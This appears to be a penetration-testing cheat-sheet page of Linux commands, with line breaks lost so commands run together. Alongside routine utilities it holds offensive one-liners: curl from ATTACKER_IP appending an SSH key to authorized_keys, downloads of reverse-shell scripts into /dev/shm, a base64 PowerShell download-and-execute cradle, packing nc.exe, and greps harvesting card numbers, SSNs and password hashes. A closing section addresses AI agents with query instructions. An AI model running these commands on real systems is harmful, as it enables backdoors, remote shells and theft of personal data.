# Useful Linux Commands

## Common Bash <a href="#common-bash" id="common-bash"></a>

```
base64 -w 0 file​xxd -p boot12.bin | tr -d '\n'​curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authotized_keys​echo -n -e​wc -l <file> wc -c ​sort -nr cat file | sort | uniq ​sed -i 's/OLD/NEW/g' path/file ​wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.pywget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shmcurl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py​lsof lsof -p 3 lsof -i lsof -i 4 lsof -i 6 lsof -i 4 -a -p 1234 lsof +D /lib lsof -i :80 fuser -nv tcp 80​tar -xvzf /path/to/yourfile.tgztar -xvjf /path/to/yourfile.tbzbzip2 -d /path/to/yourfile.bz2tar jxf file.tar.bz2gunzip /path/to/yourfile.gzunzip file.zip7z -x file.7zsudo apt-get install xz-utils; unxz file.xz​useradd -p 'openssl passwd -1 ' hacker  ​xclip -sel c < cat file.txt​python -m SimpleHTTPServer 80python3 -m http.serverruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"php -S $ip:80​curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpointcurl -X GET -H 'Authorization: Bearer ' http://host:3000/endpoint​​dd if=file.bin bs=28 skip=1 of=blob​sudo apt-get install libguestfs-toolsguestmount --add NAME.vhd --inspector --ro /mnt/vhd ​ssh-keyscan 10.10.10.101​openssl s_client -connect 10.10.10.127:443 openssl x509 -in ca.cert.pem -text openssl genrsa -out newuser.key 2048 openssl req -new -key newuser.key -out newuser.csr openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12openssl rsa -in key.ssh.enc -out key.sshopenssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz​perf stat -x, -e instructions:u "ls"​find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2>/dev/null​sudo dpkg-reconfigure tzdata​apt-file search /usr/bin/file ​echo "CIKUmMesGw==" | base64 -d | protoc --decode_raw​sudo chattr +i file.txtsudo chattr -i file.txt 
```

## Bash for Windows <a href="#bash-for-windows" id="bash-for-windows"></a>

```
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0upx -9 nc.exe​wine exe2bat.exe nc.exe nc.txt​pip install pyinstallerwget -O exploit.py http://www.exploit-db.com/download/31853  python pyinstaller.py --onefile exploit.py​i686-mingw32msvc-gcc -o executable useradd.c
```

## Greps <a href="#greps" id="greps"></a>

```
grep -E -o "\b[A-Za-z0-9._%+-][email protected][A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt​grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" file.txt​grep -i "pwd\|passw" file.txt​grep -i "user\|invalid\|authentication\|login" file.txt​egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txtgrep -e "[0-7][0-9a-f]{7}[0-7][0-9a-f]{7}" *.txt > mysql-old-hashes.txtgrep -e "$2a\$\08\$(.){75}" *.txt > blowfish-hashes.txtegrep -o "([0-9a-zA-Z]{32}):(w{16,32})" *.txt > joomla.txtegrep -o "([0-9a-zA-Z]{32}):(S{3,32})" *.txt > vbulletin.txtegrep -o '$H$S{31}' *.txt > phpBB3-md5.txtegrep -o '$P$S{31}' *.txt > wordpress-md5.txtegrep -o '$S$S{52}' *.txt > drupal-7.txtegrep -o '$1$w{8}S{22}' *.txt > md5-unix-old.txtegrep -o '$apr1$w{8}S{22}' *.txt > md5-apr1.txtegrep -o '$6$w{8}S{86}' *.txt > sha512crypt.txt​grep -E -o "\b[a-zA-Z0-9.#?$*_-][email protected][a-zA-Z0-9.#?$*_-]+.[a-zA-Z0-9.-]+\b" *.txt > e-mails.txt​grep http | grep -shoP 'http.*?[" >]' *.txt > http-urls.txtgrep -E '(((https|ftp|gopher)|mailto)[.:][^ >"	]*|www.[-a-z0-9.]+)[^ .,;	>">):]' *.txt > urls.txt​grep -E -o "^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt​grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txtgrep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txtgrep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txtgrep -E -o "\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b" *.txt > diners.txtgrep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txtgrep -E -o "\b(?:2131|1800|35d{3})d{11}\b" *.txt > jcb.txtgrep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt​grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txtgrep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > indiana-dln.txtgrep -E -o "C0[0-9]{7}" *.txt > us-pass-card.txtgrep -E -o "[23][0-9]{8}" *.txt > us-pass-num.txtgrep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txtegrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt
```

## Nmap search help <a href="#nmap-search-help" id="nmap-search-help"></a>

```
nmap --script-help "(default or version) and *smb*"locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smbnmap --script-help "(default or version) and smb)"
```

## Bash <a href="#bash" id="bash"></a>

```
for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done
```

## Iptables <a href="#iptables" id="iptables"></a>

```
iptables --flushiptables --delete-chain​iptables -A INPUT -i lo -j ACCEPTiptables -A OUTPUT -o lo -j ACCEPT​iptables -A INPUT -p icmp -m icmp --icmp-type any -j DROPiptables -A OUTPUT -p icmp -j DROP​iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT​iptables -A INPUT -s 10.10.10.10/24 -p tcp -m tcp --dport 22 -j ACCEPTiptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPTiptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPTiptables -A INPUT -p udp -m udp --sport 53 -j ACCEPTiptables -A INPUT -p tcp -m tcp --sport 53 -j ACCEPTiptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPTiptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT​iptables -P INPUT DROPiptables -P FORWARD ACCEPTiptables -P OUTPUT ACCEPT
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacktrick.gitbook.io/hacktrick/linux-unix/useful-linux-commands.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.